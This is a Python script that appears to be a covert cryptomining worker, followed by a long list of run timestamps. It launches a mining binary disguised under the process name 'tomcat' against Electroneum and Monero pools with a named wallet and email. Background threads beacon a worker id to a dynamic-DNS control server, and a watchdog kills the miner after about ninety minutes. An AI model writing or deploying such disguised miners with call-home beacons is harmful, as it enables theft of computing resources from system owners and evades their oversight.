import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:38:05.208346
#2018-02-17 17:26:04.905448
#2018-02-17 19:15:05.951269
#2018-02-17 21:06:07.554634
#2018-02-17 22:50:08.720706
#2018-02-18 00:35:08.243633
#2018-02-18 02:25:07.879896
#2018-02-18 04:12:03.641084
#2018-02-18 06:02:07.195664
#2018-02-18 07:53:01.776647
#2018-02-18 09:40:09.470095
#2018-02-18 11:27:05.423392
#2018-02-18 13:13:06.350695
#2018-02-18 15:02:06.119893
#2018-02-18 16:50:06.341242
#2018-02-18 18:38:05.786186
#2018-02-18 20:25:07.805519
#2018-02-18 22:11:05.010836
#2018-02-18 23:58:07.487855
#2018-02-19 01:45:04.138871
#2018-02-19 03:34:03.622251
#2018-02-19 05:19:01.994529
#2018-02-19 07:06:01.612199
#2018-02-19 08:54:05.411396
#2018-02-19 10:44:05.798962
#2018-02-19 12:32:09.684308
#2018-02-19 14:21:07.800891
#2018-02-19 16:09:01.756941
#2018-02-19 17:56:07.068970
#2018-02-19 19:42:06.390708
#2018-02-19 21:29:06.584406
#2018-02-19 23:14:05.270039
#2018-02-20 01:01:08.052285
#2018-02-20 02:50:06.103621
#2018-02-20 04:39:07.728324
#2018-02-20 06:23:03.672719
#2018-02-20 08:07:07.878086
#2018-02-20 09:53:05.889792
#2018-02-20 11:37:02.202758
#2018-02-20 13:24:01.519487
#2018-02-20 15:09:01.443027
#2018-02-20 16:53:11.992639
#2018-02-20 18:43:04.951764
#2018-02-20 20:34:04.837759
#2018-02-20 22:18:05.487020
#2018-02-20 23:59:06.147215
#2018-02-21 01:45:08.606005
#2018-02-21 03:36:01.837236
#2018-02-21 05:25:03.556238
#2018-02-21 07:13:04.254362
#2018-02-21 08:58:07.793843
#2018-02-21 10:47:06.788869
#2018-02-21 12:35:07.166452
#2018-02-21 14:21:08.071016
#2018-02-21 16:09:09.212193
#2018-02-21 17:59:05.657266
#2018-02-21 19:47:12.395808
#2018-02-21 21:35:01.956033
#2018-02-21 23:21:04.486090
#2018-02-22 01:10:06.685280
#2018-02-22 02:57:01.616112
#2018-02-22 04:43:04.126097
#2018-02-22 06:28:02.045635
#2018-02-22 08:15:10.464446
#2018-02-22 10:04:08.921822
#2018-02-22 11:48:01.795967
#2018-02-22 13:35:05.699174
#2018-02-22 15:23:09.743216
#2018-02-22 17:09:01.595215
#2018-02-22 18:55:09.411236
#2018-02-22 20:46:06.319007
#2018-02-22 22:31:06.297769
#2018-02-23 00:17:05.788894
#2018-02-23 02:06:07.656133
#2018-02-23 03:54:07.456850
#2018-02-23 05:33:06.918867
#2018-02-23 07:17:07.365462
#2018-02-23 09:21:01.939228
#2018-02-23 11:26:08.800709
#2018-02-23 13:15:03.119683
#2018-02-23 15:01:04.338703
#2018-02-23 16:51:02.043733
#2018-02-23 18:40:04.904282
#2018-02-23 20:26:02.039805
#2018-02-23 22:13:07.112333
#2018-02-24 00:00:10.384471
#2018-02-24 01:49:04.048151
#2018-02-24 03:41:05.285717
#2018-02-24 05:26:04.549218
#2018-02-24 07:13:06.532339
#2018-02-24 09:02:02.044304
#2018-02-24 11:02:07.063723
#2018-02-24 12:51:04.604470
#2018-02-24 14:39:05.580625
#2018-02-24 16:28:03.922554
#2018-02-24 18:20:01.797482
#2018-02-24 20:06:01.992683
#2018-02-24 21:48:04.564476
#2018-02-25 00:49:02.123162
#2018-02-25 03:51:05.485449
#2018-02-25 06:37:01.788655
#2018-02-25 11:36:07.066053
#2018-02-25 13:35:02.103598
#2018-02-25 15:09:02.139058